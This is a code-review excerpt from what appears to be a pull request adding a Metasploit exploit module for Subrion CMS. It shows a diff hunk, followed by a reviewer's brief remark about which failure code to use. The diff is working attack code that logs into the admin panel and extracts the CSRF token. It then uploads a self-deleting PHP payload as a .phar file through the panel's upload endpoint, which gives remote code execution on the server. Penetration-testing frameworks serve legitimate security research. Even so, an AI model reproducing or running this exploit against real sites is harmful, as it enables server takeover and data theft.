modules/exploits/linux/http/subrion_cms_file_upload_rce.rb

```diff
@@ -0,0 +1,213 @@
+      )
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login_and_get_csrf_token(username, password)
+    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')
+
+    # Session cookies need to be kept to preserve the CSRF token across multiple requests
+    uri = normalize_uri(target_uri.path, 'panel/')
+    url_login = "http://#{datastore['RHOST']}#{uri}"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'keep_cookies' => true
+    })
+
+    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">
+    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body
+    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?
+
+    print_good("Successfully obtained CSRF token: #{csrf_token}")
+
+    print_status(
+      "Logging in to Subrion Admin Panel at: #{url_login} " \
+      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"
+    )
+    auth = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'keep_cookies' => true,
+      'vars_post' => {
+        '__st' => csrf_token,
+        'username' => username,
+        'password' => password
+      }
+    })
+
+    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body
+    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')
+      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")
+    end
+
+    print_good('Successfully logged in as Administrator.')
+    return csrf_token
+  end
+
+  def upload_and_execute_payload(csrf_token)
+    print_status('Preparing payload...')
+
+    # set `unlink_self: true` to delete the file after execution
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"
+    php_payload = get_write_exec_payload(unlink_self: true)
+
+    data = Rex::MIME::Message.new
+    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')
+    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')
+    data.add_part(
+      "#{php_payload}\n",
+      'application/octet-stream',
+      nil,
+      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""
+    )
+    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')
+
+    print_status('Sending POST data...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::PayloadFailed, "#{peer} - Failed to upload PHP payload.")
```

Comment:
It looks like an issue with payload delivery, not the payload itself. Maybe something like `Failure::UnexpectedReply` would be more appropriate? (see [doc](https://docs.metasploit.com/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters)).